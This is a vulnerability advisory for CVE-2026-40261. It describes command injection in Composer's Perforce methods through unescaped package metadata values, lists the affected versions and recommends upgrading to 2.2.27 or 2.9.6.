PT-2026-32622 · Composer · Composer

Published

2026-04-14

·

Updated

2026-04-16

·

CVE-2026-40261

CVSS v3.1

8.8

High

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions Composer versions 1.0 through 2.2.26 Composer versions 2.3 through 2.9.5
Description Command injection is possible through the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping. Additionally, the Perforce::generateP4Command() method interpolates user-supplied Perforce connection parameters (port, user, client) from the source url field without proper escaping. An attacker can inject arbitrary commands via crafted source reference or source url values containing shell metacharacters, even if Perforce is not installed. These values are provided as part of package metadata, allowing any compromised or malicious repository to serve malicious values. The issue is exploitable when installing or updating dependencies from source, including the default behavior for dev-prefixed versions.
Recommendations Update versions 1.0 through 2.2.26 to 2.2.27. Update versions 2.3 through 2.9.5 to 2.9.6. Avoid installing dependencies from source by using --prefer-dist or the preferred-install: dist config setting. Only use trusted Composer repositories.

Exploit

Fix

RCE

OS Command Injection

Weakness Enumeration

Related Identifiers

CVE-2026-40261
GHSA-GQW4-4W2P-838Q

Affected Products

Composer